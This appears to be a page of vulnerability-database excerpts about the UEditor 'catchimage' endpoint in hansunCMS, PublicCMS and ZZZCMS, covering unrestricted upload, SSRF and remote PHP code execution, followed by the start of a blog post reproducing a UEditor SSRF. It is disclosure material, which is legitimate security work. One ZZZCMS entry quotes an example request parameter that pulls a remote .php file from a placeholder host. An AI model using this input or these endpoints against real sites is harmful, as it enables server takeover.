CVE-2023-2245
CVE-2023-2245 - hansunCMS 1.4.3 unrestricted upload. Affected component: the endpoint /ueditor/net/controller.ashx?action=catchimage in hansunCMS 1.4.3. Root cause described as manipulation allowing unrestricted upload, enabling remote exploitation. Sources indicate the vulnerability is critical...
HANSUNCMS code issue vulnerability
HANSUNCMS is a website builder system from China's HANSUN Technology (HANSUN Company). HANSUNCMS version 1.4.3 contains a code issue vulnerability that stems from problems in the file /ueditor/net/controller.ashx?action=catchimage, which can lead to unrestricted uploads...
PT-2023-18506 · Hansuncms · Hansuncms
Name of the Vulnerable Software and Affected Versions: hansunCMS version 1.4.3
Description: A critical issue affects the /ueditor/net/controller.ashx?action=catchimage file, leading to unrestricted upload. The attack can be initiated remotely. The issue has been publicly disclosed and may be...
CVE-2021-27693
Server-side Request Forgery SSRF vulnerability in PublicCMS before 4.0.202011.b via /publiccms/admin/ueditor when the action is catchimage...
Server-side request forgery (SSRF)
Server-side Request Forgery SSRF vulnerability in PublicCMS before 4.0.202011.b via /publiccms/admin/ueditor when the action is catchimage...
PT-2022-9841 · Publiccms · Publiccms
Name of the Vulnerable Software and Affected Versions: PublicCMS versions prior to 4.0.202011.b
Description: The issue is related to a Server-side Request Forgery SSRF vulnerability. It affects the /publiccms/admin/ueditor endpoint when the action is catchimage. This allows for potential...
CVE-2019-16720
ZZZCMS zzzphp v1.7.2 does not properly restrict file upload in plugins/ueditor/php/controller.php?upfolder=news&action=catchimage, as demonstrated by uploading a .htaccess or .php5 file...
CVE-2019-10647
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source parameter because of a lack of inc/zzzfile.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if th...
Code injection
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source parameter because of a lack of inc/zzzfile.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if th...
UEditor SSRF vulnerability (JSP version): analysis and reproduction
Author: 浮萍@猎户安全实验室. Official account: 猎户安全实验室. Some time ago, during a test, I came across a system that used the UEditor editor, version 1.4.3. Version 1.4.3 of this editor is known to have an SSRF vulnerability; although it is a boolean-type SSRF, besides probing the internal network it can also be used, together with web application fingerprint information, for further testing. 0x01 Preface: Looking at the official changelog shows that the UEditor editor fixed the SSRF vulnerability in version 1.4.3.1...